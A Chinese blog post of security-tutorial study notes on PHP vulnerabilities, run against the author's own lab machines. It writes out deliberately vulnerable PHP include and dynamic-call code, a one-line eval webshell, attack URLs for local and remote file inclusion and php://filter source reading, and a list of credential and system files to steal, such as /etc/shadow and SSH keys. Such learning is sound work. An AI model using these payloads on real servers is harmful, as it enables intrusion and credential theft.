某教程学习笔记(一):17、php漏洞

最新推荐文章于 2022-03-01 15:23:49 发布
最新推荐文章于 2022-03-01 15:23:49 发布
阅读量260 收藏
点赞数
分类专栏: 某教程学习笔记 文章标签: web安全 php漏洞 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/104581842
版权

原来过了十八岁以后,就再也没有夏天了,只有如约而至的七月、八月和九月,夏天是短裤蝉鸣,和一阵暴雨后少年满怀的心事,是在八月就开始憧憬九月开学的日子。。。。

一、文件包含漏洞

1、常见包含函数

include(),require(),include_once(),require_once()

2、本地文件包含,新建一个include.php文件,里面输入

<?php $test=$_GET['c']; include($test); ?>

3、再新建一个test.txt文件,里面输入:<?php phpinfo()?>

4、访问192.168.171.128/include.php?c=test.txt
在这里插入图片描述
5、读取敏感目录文件
在这里插入图片描述
windows:

C:\boot.ini //查看系统版本

C:\WINDOWS\system32\inetsrvMetaBase.xml //IIS配置文件

C:\WINDOWS\repair\sam //存储系统初次安装的密码

C:\WINDOWS\php.ini //php配置信息

C:\WINDOWS\my.ini //mysql配置信息

linux:

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_rsa.keystore

/root/.ssh/known_hosts

/etc/passwd

/etc/shadow

/etc/my.cnf

/etc/httpd/conf/httpd.conf

/root/.bash_history

/root/.mysql_history

/proc/mounts

/proc/config.gz

二、远程文件包含

1、将上面新建的test.txt文件放到另一台服务器上192.168.1.103

2、访问 http://192.168.171.128/include.php?c=http://192.168.1.103/test.txt
在这里插入图片描述
确保php.ini中allow_url_fopen和allow_url_include要为On

三、伪协议利用读取php文件的源码

1、读取test.php文件结果如下
在这里插入图片描述
2、通过伪协议可以获取test.php的源码

http://192.168.171.128/include.php?c=php://filter/read=convert.base64-encode/resource=test.php
在这里插入图片描述
base64解码以后,获取文件源码
在这里插入图片描述
四、代码执行漏洞

1、常见代码执行函数

eval()/assert()/system()/exec()/shell_exec()/passthru()/escapesshellcmd()/pcntl_exec()

例如:<?php eval($_POST[a];?>

2、 获取ip相关信息

http://192.168.171.128/test.php?a=system(‘ipconfig’);
在这里插入图片描述
3、动态代码执行

新建test.php,内容为:

<?php $a=$_GET['a']; $b=$_GET['b']; $a($b); ?>

访问: http://192.168.171.128/test.php?a=system&b=ipconfig
在这里插入图片描述

禁止非法,后果自负
欢迎关注公众号:web安全工具库
在这里插入图片描述

web安全工具库
关注
专栏目录
xss绕过空格符号_某教程学习笔记(一):16、XSS漏洞
weixin_39757743的博客
12-22 695
真希望有一天,能将日记本里酝酿了一整夏的情话,写成情书寄予你,将那些曾经的词不达意、言不由衷、拐弯抹角的小情意,都坦坦荡荡讲给你听啊。。。---- 网易与热评一、Xss漏洞原因由于代码过滤不严格,导致js代码被执行的输出问题二、xss漏洞危害网络钓鱼,盗取各类账号窃取用户cookie窃取用户浏览请求弹广告,刷流量网页挂马提升用户权限传播跨站脚本蠕虫等二、反射性 XSS1、输入正常的内容,会显示he...
手工挖洞学习笔记phpMyAdmin 默认安装漏洞(小白自学)/写入webshell/写入php反弹shell
AI_Jardon的博客
08-12 1086
phpMyAdmin 默认安装 工具: (1)burpsuite (2)靶机:Metasploitable2 前提: 靶机IP:192.168.1.175 由于是http协议,所以端口:80 验证漏洞 到达靶机源url 在url中插入:…//phpMyAdmin/setup 得到: 说明存在phpMyAdmin默认安装漏洞 利用漏洞 打开burpsuite —进入repeater 如图: 开始利用漏洞: 首先:编写目标IP、端口 输入前提上的目标IP、端口 注意:此处use HTTPS 针对于使用
php漏洞大全
03-09
PHP网页的安全性问题   针对PHP的网站主要存在下面几种攻击方式:   1.命令注入(Command Injection)   2.eval注入(Eval Injection)   3.客户端脚本攻击(script Insertion)   4.跨网站脚本攻击(Cross Site scripting, XSS)   5.SQL注入攻击(SQL injection)   6.跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)   7.Session 会话劫持(Session Hijacking)   8.Session 固定攻击(Session Fixation)   9.HTTP响应拆分攻击(HTTP Response Splitting)   10.文件上传漏洞(File Upload Attack)   11.目录穿越漏洞(Directory Traversal)   12.远程文件包含攻击(Remote Inclusion)   13.动态函数注入攻击(Dynamic Variable Evaluation)   14.URL攻击(URL attack)   15.表单提交欺骗攻击(Spoofed Form Submissions)   16.HTTP请求欺骗攻击(Spoofed HTTP Requests)   几个重要的php.ini选项
PHP漏洞扫描工具.zip
01-06
PHP漏洞扫描工具.zip
6个PHP漏洞扫描工具
weixin_30609331的博客
06-17 224
6个PHP漏洞扫描工具 摘自;http://www.hotscripts.com/blog/6-free-php-security-auditing-tools/ posted on 2010-06-17 19:26 jackyrong的世界 阅读(...) 评论(......
漏洞库网站
Action
04-27 636
关于漏洞的国内外网站
远程代码执行漏洞利用
Z_l123的博客
03-01 409
PHP下,允许命令执行的函数有 eval() assert() preg_replace() call_user_func() $a($b) eval() <?php if(isset($_GET['a'])){ eval($_GET['a']); } else{ echo "Please input a"; } ?> assert() <?php if(isset($_GET['a'])){ assert($_GET['a']); } else{ e
手工挖洞学习笔记:dvwa命令执行漏洞/载入php反弹shell
AI_Jardon的博客
08-13 1356
命令执行漏洞 工具: (1)靶机:Metasploitable2 (2)nc (3)kali dvwa 代码审计:安全级别为low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Wi
PHP学习笔记之三 数据库基本操作
10-28
本文是关于PHP学习中数据库操作的基础知识,主要涉及MySQL数据库的使用和PHP与数据库之间的交互。首先,作者指出,在Linux系统上MySQL通常已经预装,在Windows系统上安装MySQL也是比较简单的,因此不再赘述安装过程...
php常见漏洞及编码安全(附笔记
07-09
1. SQL注入:SQL注入是最常见的PHP漏洞之一,发生在开发者未对用户输入的数据进行充分过滤或转义时。攻击者可以通过构造恶意的SQL语句来获取、修改或删除数据库中的敏感信息。防止SQL注入的方法包括使用预处理语句...
php命令执行
weixin_45111459的博客
06-24 789
前一篇写了代码执行 代码执行跟命令执行的区别是代码执行的是php代码 比如echo 123; phpinfo()等,命令执行执行的是系统命令,whoami ,net user ,看起来好像命令执行的危害更高一点,但是通过代码执行也可调用系统命令的函数如 system('whoami'),所以危害一样大。 1.system() (PHP 4, PHP 5, PHP 7, PHP 8) system—执行外部程序,并且显示输出,有回显 <?php $a=$_GET['id']; syst...
命令执行漏洞
weixin_30668887的博客
04-20 284
命令执行是指攻击者通过浏览器或者其他客户端软件提交一些cmd命令(或者bash命令)至服务器程序,服务器程序通过system、eval、exec等函数直接或者间接地调用cmd.exe执行攻击者提交的命令。原理:由于开发人员在编写php源代码时,没有对源代码中可执行的特殊函数入口做过滤,导致客户端可以提交一些cmd命令,并交由服务器程序执行。WEB服务器没有过滤类似system、eval、exec等...
<转载>一个官方没有公布的php秘籍,可用作后门
ice
03-05 76
可以看看 http://www.webshell.cc/3303.html 好奇怪的漏洞? 可以当做个小马使用,比较有意思的一个东西 写道 被过滤广告 发现这个也是巧合,我就直接说了吧 &lt;?php //t.php $test = $_GET['r']; echo `$test`; ?&gt;大家看看这个代码有木有问题? 这里是我们自己的交流平台,是属于我们90sec所有成员的技术分...
CTF命令执行及绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
webshell检测方式深度剖析---语法语义检测(中)
罗斯839的博客
10-13 799
目录概论1 配置1.1 文件扩展名1.2 PVF列表1.3 全局安全函数列表1.4 外部输入列表1.5 关注函数列表1.6 漏洞帮助信息1.7 Token分类列表2 模型构建2.1词法分析和语法分析2.2 模型构建2.3控制流分析3 分析3.1污点分析3.2过程内和过程间分析RIPS的局限性 概论 RIPS的核心分析器是用php语言写的,检测结果保存为HTML文件,并用javascript写的窗口管理器来展示检测结果。 RIPS不需要第三方依赖,只需要一个web服务器和浏览器即可,将检测代码部署到服务器上,
PHP漏洞全解
04-15 1017
针对PHP的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injecti...
代码执行漏洞
weixin_30550271的博客
04-20 115
代码执行是指攻击者通过浏览器或者其他客户端软件提交一些用户自己构造的php代码至服务器程序,服务器程序通过eval、assert、reg_replace等函数执行用户提交的php代码。其实,我们平时所见到的SQL注入、xss等漏洞都是代码执行漏洞。测试代码:<?php$a = $_GET['a'];eval ($a);//assert ($a);?>开启Firefox,输入:http:...
CGCTF平台web题writeup
test
10-25 1万+
前言 正文 签到题 10pt tips : 这一定是最简单的 连接 恩,key在源代码中 md5 collision 20pt 连接 直接贴出了代码 $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' &amp;amp;amp;&amp;amp;amp; $md51 == $md5...
php文件包含漏洞
渗透笔记
02-07 1102
1.文件包含的原理 1.1为什么要使用文件包含 将一些自定义函数或功能写在一个a文件内,当b文件中要使用到a文件内的一些函数或功能时,b文件只需要包含a文件,这样b文件就可以直接调用a文件内定义好的函数或一些功能,这样方便省事。 1.2相关测试代码 php文件包含代码 if ($_GET['file']) { include $_GET['file']; }els
暗月教程学习笔记(上):脚本渗透与eWebeditor漏洞利用
暗月教程学习笔记(上)是一份关于IT渗透领域的基础教程,主要分为三课内容。首先,第一课介绍了脚本渗透的概览,这包括理解渗透攻击的基本概念、目标和方法,以及在实际环境中如何运用脚本进行安全评估和漏洞探测...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值